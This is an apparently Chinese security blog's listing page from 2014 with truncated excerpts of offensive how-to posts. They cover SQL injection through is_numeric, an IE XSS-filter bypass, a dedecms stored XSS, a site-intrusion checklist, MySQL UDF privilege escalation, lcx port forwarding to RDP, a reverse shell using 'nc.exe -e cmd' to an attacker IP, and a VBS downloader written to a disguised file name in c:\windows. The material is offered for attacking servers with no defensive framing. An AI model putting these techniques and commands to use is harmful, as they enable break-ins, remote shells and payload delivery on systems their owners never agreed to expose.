摘要:
0×00 简介国内一部分CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric ( mixed $var )如果 var 是数字和数字字符串则返回 TRUE,否则返回 FALSE。0×01 函数是否安全接下来我们来看个例子,说明这个函数是否安全。$s = is_numeric($_GET['s'])?$_GET['s']:0;$sql="insert into test(type)values($s);";//是 values($s) 不是values('$s 阅读全文
posted @ 2014-03-15 15:45
milantgh
阅读(6207)
评论(0)
推荐(0)
摘要:
反射xss利用方法,绕过IE XSS Filter假设 1.php页面代码如下:echo $_GET['str'];使用IE浏览器访问该页面1.php?str=由于xss filter渲染 导致XSS不成功接下来我们要这么绕过呢?如果该站点 可以发帖、友情链接等等 只要能发链接地址其实不只发链接 嘿嘿。由于IE XSS FILTER 只是检测 referer 是否来自本源,如果来自本源 则 Ie XSS FILTER则不生效。你现在明白了吧在javascript: date: 等协议无效的情况下:">求友情链接IE用户点击即可中招(其他部分浏览器也中招) 阅读全文
posted @ 2014-03-15 15:41
milantgh
阅读(680)
评论(0)
推荐(0)
摘要:
由于编辑文章的模板参数 typeid2可控,导致存储XSS发生。dedecms/dede/templets/article_edit.htm页面316-325行代码如下: 文章副栏目: ' style='width:200px;' /> , 'typeid2', '')" alt='选择副栏目' title='选择副栏目' /> 从上面可以看出,变量$channelid 与 $arcRow['typeid2'] 只要可控... 阅读全文
posted @ 2014-03-15 15:37
milantgh
阅读(708)
评论(0)
推荐(0)
摘要:
(一)针对网站程序,不考虑服务器。一、查找注入,注意数据库用户权限和站库是否同服。二、查找XSS,最近盲打很流行,不管怎样我们的目的是进入后台。三、查找上传,一些能上传的页面,比如申请友链、会员头像、和一些敏感页面等等,注意查看验证方式是否能绕过,注意结合服务器的解析特性,比如典型的IIS6.0、Apache等。四、查找编辑器,比较典型的ewebeditor、fckeditor等等。五、查找phpmyadmin等管理程序,可以尝试弱口令,或者寻找其漏洞。六、百度、谷歌搜索程序公开漏洞。七、猜解文件,如知道某文件为admin_login.php,我们可尝试admin_add.php、admin_ 阅读全文
posted @ 2014-03-15 15:02
milantgh
阅读(1367)
评论(0)
推荐(0)
摘要:
Server-U等都不可以用的情况下. 一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口… 那么这种方法也失效了….1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)web目录都是有写有读的权限,我们直接传NC进去2:然后本地执行nc -vv -lp 52进行反弹3:在shell命令下执行F:\wwwroot\img\nc.exe -e cmd上传路径 IP(外网IP) 52(这里是本机端口)4:在shell里执行命令后,马上看到本地CMS里已经反弹上去了,执行net user 也是成功.5:直接 阅读全文
posted @ 2014-03-15 14:28
milantgh
阅读(11054)
评论(0)
推荐(0)
摘要:
一、适用条件 1.目标系统是Windows(Win2000,XP,Win2003); 2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。 3.有mysql账号密码 二、导出udf MYSQL 5.1以下版本导出路径 阅读全文
posted @ 2014-03-15 14:10
milantgh
阅读(1441)
评论(0)
推荐(0)
摘要:
cmd:执行命令的载体cmdshelllcx:端口映射工具1.在自己的host上的cmd下运行:lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口2.在服务器器上运行:lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口3.在自己的host上的cmd下运行mstsc,输入127.0.0.1:3389远程连接服务器nc:监听工具A:基本用法1.连接到REMOTE主机格式:nc.exe -nvv 192.168.2.2 80讲解:连到192.168.2.2的TCP80端口2. 阅读全文
posted @ 2014-03-15 14:04
milantgh
阅读(2671)
评论(0)
推荐(1)
摘要:
1.端口映射解决内网提权步骤:1.在自己的host上的cmd下运行:lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口2.在服务器器上运行:lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口3.在自己的host上的cmd下运行mstsc,输入127.0.0.1:3389远程连接服务器在webshell上执行lcx,实现端口转发:for example:lcx.exe -slave 127.0.0.1 51 192.168.2.2 3389使用工具:cmd.exe lc. 阅读全文
posted @ 2014-03-15 12:54
milantgh
阅读(662)
评论(0)
推荐(0)
摘要:
vbs下载者:011:0203echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs0405echo sGet.Mode = 3 >>c:\windows\cftmon.vbs0607echo sGet.Type = 1 >>c:\windows\cftmon.vbs0809echo sGet.Open() >>c:\windows\cftmon.vbs1011echo sGet.Write(xPost.responseBody) >> 阅读全文
posted @ 2014-03-15 12:25
milantgh
阅读(1326)
评论(0)
推荐(0)
摘要:
旁站路径问题:1、读网站配置。2、用以下VBS:01On Error Resume Next0203If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then0405MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo"0607WScr 阅读全文
posted @ 2014-03-15 12:23
milantgh
阅读(1563)
评论(0)
推荐(0)
浙公网安备 33010602011771号